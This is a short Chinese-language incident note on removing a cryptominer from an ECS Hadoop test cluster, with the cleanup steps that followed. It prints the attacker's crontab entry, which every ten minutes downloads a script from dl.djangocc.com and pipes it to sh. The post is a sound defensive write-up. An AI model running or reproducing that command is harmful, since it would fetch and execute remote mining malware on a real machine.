【解決】ECS測試集羣遭遇挖礦程序攻擊

[root@hadoop1 sbin]# crontab -l
*/10 * * * * (curl -fsSL --retry 3 -m180 "http://dl.djangocc.com:8080/p?a=p&a2=cron"||wget -q --tries=3 -T180 -O- "http://dl.djangocc.com:8080/p?a=p&a2=cron")|sh

rm -rf /var/spool/cron/root
systemctl stop cron
systemctl disable crond.service

find / -name '*bioset*'

[root@hadoop1 sbin]# find / -name '*bioset*'
/var/tmp/.systemd-private-c15c0d5284bd838c15fd0d6c5c2b50bb-systemd-resolved.service-xCkB12/vje9c1vlq/bk20vm2o/xCkB12/bioset
[root@hadoop1 sbin]# rm -rf /var/tmp/.systemd-private-c15c0d5284bd838c15fd0d6c5c2b50bb-systemd-resolved.service-xCkB12/vje9c1vlq/bk20vm2o/xCkB12/bioset

reboot //重啓一下

最後在8080等常用端口配置入網規則，限制IP。